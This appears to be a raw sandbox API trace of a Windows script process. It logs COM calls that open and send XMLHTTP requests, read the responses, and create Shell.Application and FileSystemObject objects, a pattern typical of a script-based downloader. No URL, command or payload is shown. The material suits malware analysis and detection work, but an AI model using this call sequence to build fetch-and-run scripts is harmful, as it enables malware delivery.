	[0239.355] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0239.355] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74d0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0239.355] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0239.355] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0239.355] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74d0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0239.355] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0240.005] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0240.006] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74d0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0240.006] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0240.006] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0240.006] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74d0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0240.006] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0240.006] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0240.006] SysStringLen (param_1=0x0) returned 0x0
	[0240.006] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0240.006] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0240.006] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0240.006] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0240.006] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0240.006] ??2@YAPEAX_K@Z () returned 0x62f350
	[0240.006] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0240.006] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0240.006] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0240.006] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0240.007] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0240.007] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0240.007] SysStringLen (param_1=0x0) returned 0x0
	[0240.007] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0240.009] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0240.009] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0240.009] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0240.009] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0240.009] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0240.009] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0240.588] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0240.588] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74d0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0240.588] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0240.589] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0240.590] SysStringLen (param_1=0x0) returned 0x0
	[0240.590] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0240.590] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0240.590] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74d0) returned 0x0
	[0240.590] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0240.590] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7488) returned 0x0
	[0240.590] ??2@YAPEAX_K@Z () returned 0x62f310
	[0240.590] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7488, pUnkSite=0x62f310) 
	[0240.590] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0240.590] XMLHTTPRequest:IUnknown:Release (This=0x49c7488) returned 0x0
	[0240.590] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74d0) returned 0x0
	[0240.590] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74d0) returned 0x3
	[0240.590] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0240.590] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74d0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0240.592] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0240.592] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0240.592] SysStringLen (param_1=0x0) returned 0x0
	[0240.592] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0240.593] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0240.593] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0240.593] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0240.593] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0240.593] ??2@YAPEAX_K@Z () returned 0x62f330
	[0240.593] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f330) 
	[0240.593] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0240.593] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0240.593] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0240.593] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0240.593] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0240.593] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0240.593] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0240.593] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0240.593] SysStringLen (param_1=0x0) returned 0x0
	[0240.593] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0240.593] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0240.593] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0240.593] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0240.594] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7538) returned 0x0
	[0240.594] ??2@YAPEAX_K@Z () returned 0x62f310
	[0240.594] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7538, pUnkSite=0x62f310) 
	[0240.594] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0240.594] XMLHTTPRequest:IUnknown:Release (This=0x49c7538) returned 0x0
	[0240.594] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0240.594] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0240.594] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0240.594] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0240.594] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0240.594] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0240.594] SysStringLen (param_1=0x0) returned 0x0
	[0240.594] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0240.594] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0240.594] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0240.594] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0240.594] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0240.594] ??2@YAPEAX_K@Z () returned 0x62f330
	[0240.594] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f330) 
	[0240.594] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0240.594] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0240.594] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0240.594] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
